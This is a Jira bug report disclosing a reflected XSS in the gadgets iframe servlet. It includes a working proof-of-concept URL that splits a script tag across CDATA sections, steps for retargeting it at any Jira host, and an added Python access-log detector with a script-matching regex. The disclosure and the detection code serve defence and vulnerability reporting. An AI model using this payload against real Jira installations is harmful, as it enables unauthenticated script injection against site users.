Jira Platform Cloud / JRACLOUD-66366

Reflected XSS affecting JIRA via Gadgets


Steps to recreate:

1. To view the reflected XSS affecting JIRA on the current JIRA installation (jira.atlassian.com), visit the following link:

https://jira.atlassian.com/plugins/servlet/gadgets/ifr?rawxml=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22+%3F%3E%3CModule%3E%3CModulePrefs+title%3D%22Location+Map%22+height%3D%22300%22%0D%0Aauthor%3D%22a%22+author_email%3D%22a%22+%2F%3E%3CUserPref+name%3D%22lat%22+display_name%3D%22Latitude%22+required%3D%22true%22+%2F%3E%3CUserPref+name%3D%22lng%22+display_name%3D%22Longitude%22+required%3D%22true%22+%2F%3E%3CContent+type%3D%22html%22%3E%3C![CDATA[%3C]]%3Escript%3C![CDATA[%3E]]%3Ealert%28document.domain%29%3C![CDATA[%3C]]%3E/script%3C![CDATA[%3E]]%3E%3C%2FContent%3E%3C%2FModule%3E&url=https%3A%2F%2Fjira.atlassian.com%2Frest%2Fgadgets%2F1.0%2Fg%2Fcom.atlassian.jira.gadgets%3Aintroduction-gadget%2Fgadgets%2Fintroduction-gadget.xml

2. To perform the reflected XSS attack on any JIRA installation (not sure how far back this issue dates), replace the host (jira.atlassian.com, found later in the URL) with the one you wish to test on, and append the path below to the base JIRA directory:

/plugins/servlet/gadgets/ifr?rawxml=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22+%3F%3E%3CModule%3E%3CModulePrefs+title%3D%22Location+Map%22+height%3D%22300%22%0D%0Aauthor%3D%22a%22+author_email%3D%22a%22+%2F%3E%3CUserPref+name%3D%22lat%22+display_name%3D%22Latitude%22+required%3D%22true%22+%2F%3E%3CUserPref+name%3D%22lng%22+display_name%3D%22Longitude%22+required%3D%22true%22+%2F%3E%3CContent+type%3D%22html%22%3E%3C![CDATA[%3C]]%3Escript%3C![CDATA[%3E]]%3Ealert%28document.domain%29%3C![CDATA[%3C]]%3E/script%3C![CDATA[%3E]]%3E%3C%2FContent%3E%3C%2FModule%3E&url=https%3A%2F%2Fjira.atlassian.com%2Frest%2Fgadgets%2F1.0%2Fg%2Fcom.atlassian.jira.gadgets%3Aintroduction-gadget%2Fgadgets%2Fintroduction-gadget.xml

Note: This XSS requires no user interaction or authentication.
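For defenders reviewing access logs, here is an added Python example (not part of this report or of Jira) that picks out requests to the gadget iframe servlet and parses the rawxml gadget spec the way an XML parser does, so a script tag split across CDATA sections is reassembled before a signature is applied. The log lines and hostnames are constructed for the example.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs, urlparse

# Constructed access-log lines (not from the report): an ordinary gadget render that
# only passes url=, and a request supplying a whole spec via rawxml= with split CDATA.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2020:10:00:00 +0000] "GET /plugins/servlet/gadgets/ifr'
    '?url=https%3A%2F%2Fjira.example.test%2Frest%2Fgadgets%2F1.0%2Fg%2Fx.xml HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2020:10:00:01 +0000] "GET /plugins/servlet/gadgets/ifr'
    '?rawxml=%3CModule%3E%3CModulePrefs+title%3D%22x%22%2F%3E%3CContent+type%3D%22html%22%3E'
    '%3C![CDATA[%3C]]%3Escript%3C![CDATA[%3E]]%3Ealert%281%29%3C![CDATA[%3C]]%3E/script'
    '%3C![CDATA[%3E]]%3E%3C%2FContent%3E%3C%2FModule%3E&url=https%3A%2F%2Fjira.example.test%2Fx.xml'
    ' HTTP/1.1" 200 512',
]

GADGET_PATH = "/plugins/servlet/gadgets/ifr"
SCRIPT_RE = re.compile(r"<\s*script\b|\bon[a-z]+\s*=|javascript:", re.I)

def request_target(log_line):
    """Pull the request target out of a combined-format access-log line."""
    m = re.search(r'"(?:GET|POST) (\S+) HTTP/', log_line)
    return m.group(1) if m else None

def gadget_content_text(rawxml):
    """Return the text of the <Content> element(s) of an inline gadget spec. The XML
    parser joins adjacent CDATA sections and text, so <![CDATA[<]]>script<![CDATA[>]]>
    comes back as "<script>". Unparseable input is returned unchanged for inspection."""
    try:
        root = ET.fromstring(rawxml)
    except ET.ParseError:
        return rawxml
    return "".join(c.text or "" for c in root.iter("Content"))

def analyse(log_line):
    """None for requests that do not hit the gadget iframe servlet, else a verdict dict."""
    target = request_target(log_line)
    if not target:
        return None
    parsed = urlparse(target)
    if not parsed.path.endswith(GADGET_PATH):
        return None
    qs = parse_qs(parsed.query)
    verdict = {"rawxml_present": "rawxml" in qs, "naive_hit": False, "normalized_hit": False}
    if verdict["rawxml_present"]:
        rawxml = qs["rawxml"][0]
        # A signature over the URL-decoded parameter misses the split tag; the same
        # signature fires once the spec is parsed the way the servlet parses it.
        verdict["naive_hit"] = bool(SCRIPT_RE.search(rawxml))
        verdict["normalized_hit"] = bool(SCRIPT_RE.search(gadget_content_text(rawxml)))
    return verdict
```

Any request carrying rawxml at all is worth reviewing, since the servlet renders a spec supplied entirely by the requester; the normalized signature only raises the confidence of a hit.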

The original reporter of this vulnerability is Nir Goldshlager ngoldshlager@salesforce.com.

Oswaldo Hernandez (ohernandez@atlassian.com)
Nir Goldshlager